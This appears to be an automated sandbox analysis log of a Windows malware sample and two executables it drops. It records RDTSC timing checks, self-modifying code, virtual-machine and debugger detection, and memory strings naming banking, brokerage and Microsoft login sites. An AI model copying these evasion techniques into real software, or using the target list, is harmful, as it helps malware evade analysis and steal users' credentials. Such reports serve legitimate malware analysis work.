Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30C40 second address: 4F30C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30C44 second address: 4F30C4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30C4A second address: 4F30C7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FCBACB2D11Ah 0x0000000b and ecx, 0499CFD8h 0x00000011 jmp 00007FCBACB2D11Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xor dword ptr [esp], 5AB53124h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30C7C second address: 4F30C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30C80 second address: 4F30C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30C84 second address: 4F30C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30C8A second address: 4F30CA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBACB2D129h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30CA7 second address: 4F30CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30CAB second address: 4F30CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FCC1D651FD5h 0x0000000d push 75A52B70h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov eax, dword ptr [esp+10h] 0x0000001d mov dword ptr [esp+10h], ebp 0x00000021 lea ebp, dword ptr [esp+10h] 0x00000025 sub esp, eax 0x00000027 push ebx 0x00000028 push esi 0x00000029 push edi 0x0000002a mov eax, dword ptr [75AB4538h] 0x0000002f xor dword ptr [ebp-04h], eax 0x00000032 xor eax, ebp 0x00000034 push eax 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 push dword ptr [ebp-08h] 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000045 mov dword ptr [ebp-08h], eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 ret 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30CBD second address: 4F30CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBAD522AB4h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30CD6 second address: 4F30D12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FCBACB2D120h 0x00000014 or si, D628h 0x00000019 jmp 00007FCBACB2D11Bh 0x0000001e popfd 0x0000001f mov esi, 46D0FF1Fh 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30D12 second address: 4F30D24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 mov ecx, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [ebp-1Ch], esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov dl, 88h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30D3C second address: 4F30DA7 instructions: 0x00000000 rdtsc 0x00000002 mov ah, bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test al, al 0x00000009 jmp 00007FCBACB2D120h 0x0000000e je 00007FCC1D640D46h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FCBACB2D11Dh 0x0000001d or si, 4906h 0x00000022 jmp 00007FCBACB2D121h 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007FCBACB2D120h 0x0000002e sbb ecx, 5BE8BFA8h 0x00000034 jmp 00007FCBACB2D11Bh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40985 second address: 4F409E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FCBAD522AAFh 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FCBAD522AB9h 0x0000000f jmp 00007FCBAD522AABh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, esi 0x00000019 jmp 00007FCBAD522AB6h 0x0000001e push eax 0x0000001f pushad 0x00000020 call 00007FCBAD522AACh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F409E8 second address: 4F409FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 xchg eax, esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBACB2D11Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F409FB second address: 4F40A0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBAD522AAEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40A0D second address: 4F40AE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+0Ch] 0x0000000b jmp 00007FCBACB2D127h 0x00000010 test esi, esi 0x00000012 jmp 00007FCBACB2D126h 0x00000017 je 00007FCC1D63AA86h 0x0000001d pushad 0x0000001e mov dx, cx 0x00000021 mov si, F049h 0x00000025 popad 0x00000026 cmp dword ptr [75AB459Ch], 05h 0x0000002d pushad 0x0000002e call 00007FCBACB2D122h 0x00000033 pop edx 0x00000034 pushfd 0x00000035 jmp 00007FCBACB2D11Eh 0x0000003a or si, 11C8h 0x0000003f jmp 00007FCBACB2D11Bh 0x00000044 popfd 0x00000045 popad 0x00000046 je 00007FCC1D652B1Bh 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f pushfd 0x00000050 jmp 00007FCBACB2D11Bh 0x00000055 sub si, 680Eh 0x0000005a jmp 00007FCBACB2D129h 0x0000005f popfd 0x00000060 pushfd 0x00000061 jmp 00007FCBACB2D120h 0x00000066 and si, C688h 0x0000006b jmp 00007FCBACB2D11Bh 0x00000070 popfd 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40AE9 second address: 4F40B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBAD522AB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40B01 second address: 4F40B05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40BBA second address: 4F40BCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBAD522AACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40BCA second address: 4F40BCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40BCE second address: 4F40C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a push edi 0x0000000b mov di, cx 0x0000000e pop ecx 0x0000000f jmp 00007FCBAD522AB5h 0x00000014 popad 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FCBAD522AADh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40C03 second address: 4F40C09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C860A4 second address: C860A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C860A8 second address: C860C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FCBACB2D122h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8DCF4 second address: C8DD11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FCBAD522AABh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8DD11 second address: C8DD1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FCBACB2D116h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8DD1B second address: C8DD21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8DD21 second address: C8DD27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8DD27 second address: C8DD2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8E122 second address: C8E137 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D121h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8E137 second address: C8E18F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBAD522AADh 0x0000000b jmp 00007FCBAD522AB3h 0x00000010 jmp 00007FCBAD522AB9h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 jmp 00007FCBAD522AB0h 0x0000001e pop edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8E18F second address: C8E193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8E193 second address: C8E199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8E44A second address: C8E44E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8E44E second address: C8E46E instructions: 0x00000000 rdtsc 0x00000002 je 00007FCBAD522AA6h 0x00000008 jmp 00007FCBAD522AB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8E46E second address: C8E474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Special instruction interceptor: First address: 657B08 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Special instruction interceptor: First address: 657C11 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Special instruction interceptor: First address: 8021DB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Special instruction interceptor: First address: 885A71 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Special instruction interceptor: First address: 8CFC73 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Special instruction interceptor: First address: 8CFB9D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Special instruction interceptor: First address: 8CD6BA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Special instruction interceptor: First address: AA5D3B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Special instruction interceptor: First address: B13CC7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Special instruction interceptor: First address: B13368 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Memory allocated: 51A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Memory allocated: 5330000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Memory allocated: 7330000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Code function: 10_2_00C8E142 rdtsc 10_2_00C8E142
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Code function: 10_2_00CA425C sidt fword ptr [esp-02h] 10_2_00CA425C
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe TID: 4220 Thread sleep time: -32016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe TID: 2132 Thread sleep time: -34017s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe TID: 6676 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe TID: 4128 Thread sleep time: -38019s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe TID: 2520 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe TID: 1840 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe, HXPC21YC8H3Q6AWWXLQHI1I.exe, 0000000A.00000002.1717268597.0000000000C96000.00000040.00000001.01000000.00000006.sdmp, BGXAMSUR4L24WR8IH77.exe, BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1682683310.0000000000A5B000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: s31ydU1MpQ.exe, s31ydU1MpQ.exe, 00000000.00000003.1367621560.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1480098661.00000000012B9000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1564929494.00000000012B5000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1436434228.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1341921354.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012BD000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1436676563.00000000012B9000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1564929494.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1415661013.00000000012D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: s31ydU1MpQ.exe, 00000000.00000003.1367931512.0000000005995000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696492231p
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1683875991.00000000010B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWM
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1683875991.000000000103E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe, 0000000A.00000002.1717268597.0000000000C96000.00000040.00000001.01000000.00000006.sdmp, BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1682683310.0000000000A5B000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Code function: 10_2_00C8E142 Start: 00C8E199 End: 00C8E193 10_2_00C8E142
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe File opened: SIWVID
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Process queried: DebugPort Jump to behavior
